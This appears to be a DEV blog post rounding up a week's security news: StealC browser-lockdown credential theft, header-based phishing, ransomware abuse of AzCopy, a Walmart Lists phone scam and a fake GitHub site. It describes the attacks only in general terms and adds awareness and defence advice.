Introduction
What a week! I have no idea why I just wrote that 😊. Anyways, welcome to another edition of our security news weekly review here on DEV. In this week's edition, we'll cover known themes of this series. This includes malware, phishing, and online scam. That should be it, hopefully, I did not forget anything!
Let's begin!
Malware locks browser in kiosk mode to steal Google credentials
It's a story that goes like the following: frustrate the user to send over their credentials. It is clever, no doubt.
Here is how the attack works, as stated in the article:
Specifically, the malware "locks" the user's browser on Google's login page with no obvious way to close the window, as the malware also blocks the "ESC" and "F11" keyboard keys. The goal is to frustrate the user enough that they enter and save their Google credentials in the browser to "unlock" the computer.
Once credentials are saved, the StealC information-stealing malware steals them from the credential store and sends them back to the attacker.
Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks
The article is based on research from the researchers at Palo Alto's Unit 42. In some situations, the end goal for the threat actors is either your credentials or your money.
The following excerpt is the attack starts:
The starting point of the infection chain is an email message containing a link that mimics a legitimate or compromised domain that, when clicked, triggers the redirection to the actor-controlled credential harvesting page.
To lend the phishing attempt a veneer of legitimacy, the malicious webmail login pages have the recipients' email addresses pre-filled. Attackers have also been observed using legitimate domains that offer URL shortening, tracking, and campaign marketing services.
Ransomware gangs now abuse Microsoft Azure tool for data theft
To be honest, I am not surprised. Threat actors have a long history of using legitimate services for malicious purposes. By the looks of it, it's not slowing down anytime soon.
The excerpt below is not about what's going on. Instead, it's about how to defend against this attack:
Defense measures include monitoring for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints at ".blob.core.windows.net" or Azure IP ranges, and setting alarms for unusual patterns in file copying or access on critical servers.
If Azure is already used in an organization, it is recommended to check the 'Logout on Exit' option to automatically sign out upon exiting the application, so as to prevent attackers from using the active session for file theft.
Walmart customers scammed via fake shopping lists, threatened with arrest
It's an interesting read and it contains actual call recordings that the researchers had with the scammers. Stay safe, don't fall for scams. Most importantly, educate your family and friends about this threat. What's more a big shout-out to the author, Jérôme Segura of Malwarebytes.
Here is how the attack starts and what it leads to:
Case in point, a malicious ad campaign is abusing Walmart Lists, a kind of virtual shopping list customers can share with family and friends, by embedding rogue customer service phone numbers with the appearance and branding of the official Walmart site.
The scam ends in accusations of money laundering, threats of arrest warrant, and pressure to transfer money into a Bitcoin wallet.
Fake GitHub Site Targeting Developers
What should I say? Education and web security awareness can go a long way in preventing me and you from falling for attacks like this. As a security-minded person, if I go to a site and you're telling me to open the "Run" dialog box on a Windows machine, I'll take it as a red flag. But, wait, how many people know this? Hopefully, a lot.
There is no excerpt for this one. Don't worry, it's a short, and hopefully, an effective read for you.
Credits
Cover photo by Debby Hudson on Unsplash.
That's it for this week, and I'll see you next time.